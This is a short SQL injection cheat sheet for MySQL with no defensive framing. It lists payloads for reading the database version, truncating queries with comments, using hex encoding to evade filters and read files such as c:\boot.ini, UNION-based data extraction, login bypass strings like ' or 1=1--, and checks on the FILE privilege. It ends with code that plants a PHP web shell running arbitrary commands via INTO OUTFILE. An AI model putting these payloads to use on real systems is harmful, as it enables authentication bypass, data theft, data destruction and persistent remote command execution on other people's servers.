Get mysql version

SELECT @@version


Using — comments out rest of the query
Line comments are generally usefull for ignoring rest of the query so you don’t have to deal with fixing the syntax.

DROP sampletable;--


Using hex to bypass magic_quotes and similar filters
You can write hex like these:

SELECT 0x457578

There has a easy way to generate hex representatons of strings:

SELECT CONCAT('0x',HEX('c:\\boot.ini'))

Hex based SQL Injection samples:

SELECT LOAD_FILE(0x633A5C626F6F742E696E69);

This will show the content of c:\boot.ini

Union Injections
With union you do SQL queries cross-table. Basically you can position query to return records from another table.

' UNION SELECT 1,2,3 FROM tablename--


Bypassing filter evasion using comment tags:

1 UNI/**/ON SELECT ALL FROM WHERE


Bypassing Login Screens

admin' --
admin' #
admin' /*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--


The FILE privilege
find out which database user we are:

0' UNION SELECT current_user,null /*
or
0' UNION SELECT user(),null /*

check the file privilege:

0′ UNION SELECT file_priv,null FROM mysql.user WHERE user = ‘username'
or
0′ UNION SELECT grantee,is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘file’ AND grantee like ‘%username%'


Backdoor

$SHELL='<?php echo "Hi Master!";error_reporting(0);ini_set("max_execution_time",0);system($_GET[cmd]);?>’;
$SQL=”‘UNION SELECT 0,0,’”.$SHELL.”‘,0 INTO OUTFILE ‘”.$mypath.”ipn.php’ from admin/*”;
$SQL=urlencode($SQL);